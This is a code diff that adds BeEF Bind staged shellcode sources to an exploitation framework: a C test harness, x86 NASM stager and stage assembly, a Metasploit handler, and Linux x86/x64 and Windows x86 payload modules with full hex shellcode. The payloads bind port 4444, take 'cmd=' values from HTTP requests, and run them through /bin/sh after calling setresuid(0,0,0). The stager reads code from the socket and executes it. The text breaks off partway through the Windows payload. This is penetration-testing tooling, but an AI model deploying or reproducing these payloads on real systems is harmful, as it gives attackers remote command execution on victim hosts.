+char shellcode[] = "\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7";
+
+int main(int argc, char **argv) {
+   char *ptr = mmap(0, sizeof(shellcode), PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
+   if (ptr == MAP_FAILED) {perror("mmap");exit(-1);}
+   memcpy(ptr, shellcode, sizeof(shellcode));
+   sc = (int(*)())ptr;
+   (void)((void(*)())ptr)();
+   printf("\n");
+   return 0;
+}

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stage.nasm

@@ -0,0 +1,290 @@
+; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+; Browser Exploitation Framework (BeEF) - http://beefproject.com
+; See the file 'doc/COPYING' for copying permission
+
+BITS 32
+
+SECTION .text
+
+global _start
+_start:
+	cld ;clear direction flag
+	xor edx, edx ;zero edx
+
+	push BYTE 0x02
+	pop ecx
+	;create two pipes
+createpipes:
+	push edx ;allocate space on stack
+	push edx
+	mov ebx, esp ; ptr to argument array
+	push BYTE 0x2A ;sys_pipe
+	pop eax
+	int 0x80 ;syscall 
+	dec ecx 
+	jcxz endcreatepipes ;jmp when both pipes are created
+	jmp short createpipes ;create next pipe
+
+endcreatepipes:	
+	;create fork	
+	xor ebx, ebx ;zero ebx
+	push BYTE 0x02 ;sys_fork
+	pop eax
+	int 0x80 ;syscall
+	cmp eax, 0x00 ;parent or child
+	je child
+
+	mov ebx, [esp+0x8] ;close read end of one pipe
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x4] ;close write end of the other pipe
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	; make non blocking
+	mov ebx, [esp] ;fd
+	push BYTE 0x04 ;F_SETFL
+	pop ecx
+	push 0x800 ;O_NONBLOCK
+	pop edx
+	push BYTE 0x37 ;sys_fcntl
+	pop eax
+	int 0x80
+ 
+	;allocate one page of memory
+	push BYTE 0x00 ;offset = 0
+	push 0xffffffff ;fd=-1
+	push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
+	push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push 0x1000 ;allocated size
+	push 0x00 ;system determines location
+	mov ebx, esp ;ptr to argument array
+	push BYTE 0x5a
+	pop eax
+	int 0x80
+	mov edi, eax ;ptr to allocated memory
+	add esp, 0x18
+	
+doforever:
+	xor edx, edx
+	xor eax, eax
+
+	;initialize socket
+	push BYTE 0x01
+	pop ebx ;SYS_SOCKET
+	push eax ;proto = 0
+	inc eax
+	push eax ;SOCK_STREAM = 1
+	inc eax
+	push eax ;AF_INET = 2
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	mov esi, eax ; save socket filedescriptor
+	add esp, 0x0C
+
+	;reuse socket
+	push BYTE 0x0E
+	pop ebx ;SYS_SETSOCKOPT
+	push BYTE 0x04 ;sizeof socklen_t
+	push esp ;address of socklen_t
+	push BYTE 0x02 ;SO_REUSEADDR = 2
+	push BYTE 0x01 ;SOL_SOCKET = 1
+	push esi ;socket fd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102	
+	int 0x80
+	add esp, 0x14
+
+	;bind socket to port
+	push BYTE 0x02
+	pop ebx ;SYS_BIND
+	push edx ;INADDR_ANY
+	push 0x5c110002 ;PORT 0x115c = 4444
+	mov ecx, esp ;ptr to server struct
+	push BYTE 0x10 ; addrlen
+	push ecx
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	add esp, 0x14
+
+	inc ebx
+	inc ebx  ;SYS_LISTEN
+	push ebx ;backlog
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ; socketcall is syscall #102
+	int 0x80
+	add esp, 0x08
+	
+	inc ebx ;SYS_ACCEPT
+	push edx ;socklen = 0
+	push edx ;sockaddr ptr = NULL
+	push esi ;sockfd
+	mov ecx, esp ;ptr to argumet array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+	add esp, 0x0c
+	
+	xchg esi, eax ;serversocket in eax and clientsocket handler in esi
+	xchg eax, ebx ;serversocket in ebx
+	mov eax, 0x06 ;close serversocket
+	int 0x80
+
+	mov ecx, 0x1000
+firstzeromemory:
+	;zero out memory
+	dec ecx
+	mov ebx, edi
+	add ebx, ecx
+	mov BYTE [ebx], 0x00
+	jecxz readfromsocket
+	jmp firstzeromemory
+
+readfromsocket:
+	;read from socket into memory
+	mov dx, 0x400 ;read 1024 bytes
+	mov ecx, edi ;ptr to allocated memory
+	mov ebx, esi ;clientsocket
+	push BYTE 0x03
+	pop eax ;sys_read
+	int 0x80
+
+	push edi ;ptr to allocate memory
+	push esi ;clientsocket
+	mov ebx, edi ;ptr to allocated memory
+	mov ecx, 0x400 ;search in 1024 bytes
+search:
+	cmp DWORD [ebx], 0x3d646D63 ;compare with "cmd="
+	je found ;cmd= found
+	inc ebx
+	dec ecx
+	jecxz notfound ;cmd= not in recieved buffer
+	jmp search ;search some more
+
+found:
+	mov ecx, ebx ;put ptr to memory where "cmd=" was found
+	add ecx, 0x03 ;skip "cmd"
+	mov ebx, [esp+0x14] ;write to pipe
+sendcommand:
+	inc ecx ;first time skip "=", move to next byte
+	push BYTE 0x01 ;write one byte
+	pop edx
+	push BYTE 0x04 ;sys_write
+	pop eax
+	int 0x80
+	cmp BYTE [ecx], 0x0a ;LF character?
+	jne sendcommand ;else continue write to pipe
+
+	;sleep one second
+	push 0x00
+	push 0x01 ;one second
+	mov ebx, esp ;ptr to argument array
+	xor ecx, ecx ;NULL
+	mov eax, 0xA2 ;sys_nanosleep
+	int 0x80
+	add esp, 0x08 ;clean up stack	
+
+notfound:
+	call writehttpheaders	
+	db 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20,0x32,0x30,0x30,0x20,0x4f,0x4b,0x0d,0x0a  ;HTTP/1.1 200 OK
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x0d,0x0a  ;Content-Type: text/html
+	db 0x41,0x63,0x63,0x65,0x73,0x73,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x2d,0x41,0x6c,0x6c,0x6f,0x77,0x2d,0x4f,0x72,0x69,0x67,0x69,0x6e,0x3a,0x20,0x2a,0x0d,0x0a  ;Access-Control-Allow-Origin: *
+	db 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x33,0x30,0x34,0x38,0x0d,0x0a,0x0d,0x0a  ;Content-Length: 3048
+
+writehttpheaders:
+	pop esi ;source address saved by call
+	add edi, 0x400 ;ptr to memory skip 1024 bytes
+	mov ecx, 0x62 ;copy 98 bytes
+	rep movsb
+	
+	pop edi ;restore clientsocket 	
+	pop esi ;restore ptr to memory
+	
+		
+	mov ebx, [esp] ;read from pipe
+	mov ecx, esi ;ptr to memory
+	add ecx, 0x400 ;skip 1024 bytes
+	add ecx, 0x62 ;skip header
+	push 0xB86 ;read max 2950 bytes
+	pop edx
+	push BYTE 0x03 ;sys_read
+	pop eax
+	int 0x80
+
+	mov ebx, edi ;clientsocket
+	mov ecx, esi ;ptr to memory
+	add ecx, 0x400 ;skip 1024 first bytes
+	mov edx, 0xbe8 ;send max 3048 bytes
+	push BYTE 0x04 ;sys_write
+	pop eax
+	int 0x80
+
+	;close clientsocket	
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov edi, esi ;restore memory ptr into edi
+	jmp doforever
+
+child:
+	mov ebx, [esp+0xC] ;close output side of pipe 
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+	
+	xor ebx, ebx ;close stdin
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x8] ;dup input side to stdin
+	push BYTE 0x29 ;sys_dup
+	pop eax
+	int 0x80
+	
+	mov ebx, [esp] ;close input side of other pipe
+	push BYTE 0x06
+	pop eax
+	int 0x80
+
+	xor ebx, ebx
+	inc ebx ;close stdout
+	push BYTE 0x06 ;sys_close
+	pop eax
+	int 0x80
+
+	mov ebx, [esp+0x4] ;dup output side to stdout
+	push BYTE 0x29 ;sys_dup
+	pop eax
+	int 0x80
+
+	;setresuid(0,0,0)
+	xor eax, eax
+	xor ebx, ebx
+	xor ecx, ecx
+	xor edx, edx
+	mov al, 0xa4 ;sys_setresuid16
+	int 0x80
+
+	;execve("/bin//sh", 0, 0)	
+	xor eax, eax
+	push eax
+	push eax
+	push 0x68732f2f ;//sh
+	push 0x6e69622f ;/bin
+	mov ebx, esp
+	push BYTE 0x0b ;sys_execve
+	pop eax
+	int 0x80

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/linux/x86/stager.nasm

@@ -0,0 +1,111 @@
+; Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+; Browser Exploitation Framework (BeEF) - http://beefproject.com
+; See the file 'doc/COPYING' for copying permission
+
+BITS 32
+
+SECTION .text
+
+global _start
+_start:
+	cld ;clear direction flag
+	xor eax, eax ;zero eax
+	xor edx, edx ;zero edx
+
+	;initialize socket
+	push BYTE 0x01
+	pop ebx ;SYS_SOCKET
+	push eax ;  proto = 0 
+	inc eax
+	push eax ;SOCK_STREAM = 1
+	inc eax 
+	push eax ;AF_INET = 2
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102	
+	int 0x80
+	mov esi, eax ;save socket filediscriptor
+
+	push BYTE 0x0E
+	pop ebx ;SYS_SETSOCKOPT
+	push BYTE 0x04  ;sizeof socklen_t
+	push esp ; address of socklen_t
+	push BYTE 0x02  ;SO_REUSEADDR = 2
+	push BYTE 0x01 ;SOL_SOCKET = 1
+	push esi ;socket fd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ; socketcall is syscall #102
+	int 0x80
+
+	;bind socket to port
+	push BYTE 0x02
+	pop ebx ;SYS_BIND
+	push edx ;INADDR_ANY
+	push 0x5c110002 ;PORT 0x115C = 4444
+	mov ecx, esp ;server struct
+	push BYTE 0x10 ;addrlen
+	push ecx
+	push esi ;socketfd
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	inc ebx
+	inc ebx ;SYS_LISTEN
+	push ebx ;backlog
+	push esi ;socketfd
+	mov ecx, esp ;ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	inc ebx ;SYS_ACCEPT
+	push edx ;socklen = 0
+	push edx ;sockaddr ptr = NULL
+	push esi ;socketfd
+	mov ecx, esp ; ptr to argument array
+	push BYTE 0x66
+	pop eax ;socketcall is syscall #102
+	int 0x80
+
+	xchg esi, eax ;serversocket in eax and client socket handler into esi
+	xchg eax, ebx ;serversocket in ebx
+	mov eax, 0x6 ;close serversocket
+	int 0x80
+
+	push BYTE 0x00 ;offset =0
+	push 0xFFFFFFFF ;fd = -1
+	push BYTE 0x22 ;MAP_ANONYMOUS | MAP_PRIVATE
+	push BYTE 0x07 ;PROT_READ | PROT_WRITE | PROT_EXEC
+	push 0x1000 ;allocated size
+	push BYTE 0x00 ;system determines location
+	mov ebx, esp ;ptr tot argument array
+	push BYTE 0x5a
+	pop eax ;MMAP call
+	int 0x80
+	mov edi, eax ;ptr to allocated memory
+
+	; read from socket into memory
+	mov dx, 0x1000 ;max bytes to read
+	mov ecx, edi ;pointer to memory
+	mov ebx, esi ;clientsocket
+	push BYTE 0x03
+	pop eax
+	int 0x80	
+
+	push BYTE 0x06
+	pop eax ;close clientsocket
+	int 0x80
+
+search:
+	cmp DWORD [edi], 0x3d646d63 ;compare with "cmd="
+	je short found ;jump if found
+	inc edi ;look some further
+	jmp short search
+found:
+	push BYTE 0x04 
+	pop eax
+	add edi, eax ;skip "cmd="
+	jmp edi ;jump to the staged shellcode

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-handler.rb

@@ -0,0 +1,73 @@
+##
+# $Id: beef_bind-handler.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+module Msf
+module Handler
+
+###
+#
+# This module implements the Bind TCP handler placeholder only.
+#
+###
+module BeEFBind
+
+	include Msf::Handler
+
+	#
+	# Returns the handler specific string representation
+	#
+	def self.handler_type
+		return "beef_bind"
+	end
+
+	#
+	# Returns the connection oriented general handler type
+	#
+	def self.general_handler_type
+		"bind"
+	end
+
+	#
+	# Initializes a bind handler and adds the options common to all bind
+	# payloads, such as local port.
+	#
+	def initialize(info = {})
+		super
+		register_options(
+			[
+				Opt::LPORT(4444),
+				#OptAddress.new('RHOST', [false, 'The target address', '']),
+			], Msf::Handler::BeEFBind)
+	end
+
+	#
+	# Placeholder only
+	#
+	def cleanup_handler
+	end
+
+	#
+	# Placeholder only
+	#
+	def add_handler(opts={})
+		# Start a new handler
+		start_handler
+	end
+
+	#
+	# Placeholder only
+	#
+	def start_handler
+	end
+
+	# 
+	# Placeholder only
+	#
+	def stop_handler
+	end
+
+end
+
+end
+end

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x64.rb

@@ -0,0 +1,85 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Linux
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind Linux Command Shell Stage (stage x64)',
+			'Description'   => 'Spawn a piped command shell (staged) with an HTTP interface',
+			'Author'        => [ 'Bart Leppens' ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X64,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadCompat' =>
+				{
+					'Convention' => 'beef_bind'
+				},
+			'Stage'         =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 165, 'n' ]
+						},
+					'Payload' =>
+						"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" +
+						"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" +
+						"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" +
+						"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" +
+						"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" +
+						"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" +
+						"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" +
+						"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" +
+						"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" +
+						"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" +
+						"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" +
+						"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" +
+						"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" +
+						"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" +
+						"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" +
+						"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" +
+						"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" +
+						"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" +
+						"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" +
+						"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" +
+						"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" +
+						"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" +
+						"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" +
+						"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" +
+						"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" +
+						"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
+						"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" +
+						"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" +
+						"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" +
+						"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" +
+						"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" +
+						"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" +
+						"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" +
+						"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" +
+						"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" +
+						"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" +
+						"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" +
+						"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" +
+						"\xf6\x48\x31\xd2\x0f\x05"
+				}
+			))
+	end
+
+	# Stage encoding is safe for this payload
+	def encode_stage?
+		true
+	end
+end
+

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-linux-x86.rb

@@ -0,0 +1,84 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Linux
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind Linux Command Shell Stage (stage x86)',
+			'Description'   => 'Spawn a piped command shell (staged) with an HTTP interface',
+			'Author'        => [ 'Bart Leppens' ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadCompat' =>
+				{
+					'Convention' => 'beef_bind'
+				},
+			'Stage'         =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 168, 'n' ]
+						},
+					'Payload' =>
+						"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" +
+						"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" +
+						"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" +
+						"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" +
+						"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" +
+						"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" +
+						"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" +
+						"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" +
+						"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" +
+						"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" +
+						"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" +
+						"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" +
+						"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" +
+						"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" +
+						"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" +
+						"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" +
+						"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" +
+						"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" +
+						"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" +
+						"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" +
+						"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" +
+						"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" +
+						"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" +
+						"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" +
+						"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" +
+						"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" +
+						"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
+						"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" +
+						"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" +
+						"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" +
+						"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" +
+						"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" +
+						"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" +
+						"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" +
+						"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" +
+						"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" +
+						"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" +
+						"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
+				}
+			))
+	end
+
+	# Stage encoding is safe for this payload
+	def encode_stage?
+		true
+	end
+end
+

modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stage-windows-x86.rb

@@ -0,0 +1,137 @@
+##
+# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Windows
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind Windows Command Shell Stage (stager)',
+			'Version'       => '$Revision: 11421 $',
+			'Description'   => 'Spawn a piped command shell (staged) with an HTTP interface',
+			'Author'        => [ 'Ty Miller' ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86,
+			'Session'       => Msf::Sessions::CommandShellWindows,
+			'PayloadCompat' =>
+				{
+					'Convention' => 'beef_bind'
+				},
+			'Stage'         =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 511, 'n' ]
+						},
+					'Payload' =>
+						"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" +
+						"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" +
+						"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +
+						"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" +
+						"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" +
+						"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" +
+						"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
+						"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
+						"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" +
+						"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" +
+
+						"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" +
+						"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" +
+						"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" +
+						"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
+						"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" +
+						"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" +
+						"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" +
+						"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" +
+						"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" +
+						"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" +
+
+						"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" +
+						"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" +
+						"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" +
+						"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" +
+						"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" +
+						"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" +
+						"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" +
+						"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" +
+						"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" +
+						"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
+
+						"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" +
+						"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
